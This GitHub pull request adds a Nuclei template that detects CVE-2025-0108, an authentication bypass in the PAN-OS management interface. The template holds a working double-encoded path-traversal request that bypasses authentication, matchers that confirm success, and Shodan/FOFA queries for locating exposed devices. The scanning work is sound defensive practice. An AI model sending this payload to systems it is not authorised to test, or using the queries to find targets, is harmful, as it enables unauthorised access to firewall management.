### PR TITLE
Add Detection for CVE-2025-0108

### DIFF
--- a/README.md
+++ b/README.md
@@ -147,6 +147,7 @@ For the moment, we are currently focused on the CISA KEV Database and Google Tsu
 
 | CVE ID                                                  | Implemented | Detail                                                  | Published Date |
 |:--------------------------------------------------------|:-----------:|:--------------------------------------------------------|:--------------:|
+| CVE-2025-0108                                           |      ✅      | Custom Nuclei template.                                 |   2025-02-12   |
 | CVE-2025-0674                                           |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2025-02-04   |
 | CVE-2025-0890                                           |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2025-02-04   |
 | CVE-2024-55591                                          |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2025-01-14   |

--- a/agent_group.yaml
+++ b/agent_group.yaml
@@ -317,6 +317,7 @@ agents:
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-45195.yaml
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-29059.yaml
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-53704.yaml
+            - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2025-0108.yaml
       - name: use_default_templates
         type: boolean
         description: use nuclei's default templates to scan.

--- a/nuclei/CVE-2025-0108.yaml
+++ b/nuclei/CVE-2025-0108.yaml
@@ -1,0 +1,38 @@
+id: CVE-2025-0108
+
+info:
+  name: PAN-OS Management Interface - Path Confusion to Authentication Bypass
+  author: halencarjunior,ritikchaddha
+  severity: critical
+  description: |
+    A vulnerability in PAN-OS management interface allows authentication bypass through path confusion between Nginx and Apache handlers.The issue occurs due to differences in path processing between Nginx and Apache, where double URL encoding combined with directory traversal can bypass authentication checks enforced by X-pan-AuthCheck header.
+  reference:
+    - https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2025-0108
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: paloaltonetworks
+    product: pan-os
+    fofa-query: icon_hash="-631559155"
+    shodan-query:
+      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
+      - http.favicon.hash:"-631559155"
+  tags: cve,cve2025,panos,auth-bypass,kev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
+          - 'contains(header, "text/html")'
+          - 'status_code == 200'
+        condition: and


### PR DESCRIPTION
The template for this CVE is inspired from the [research](https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/) conducted by assetnote team.
- No targets were spotted when testing the template.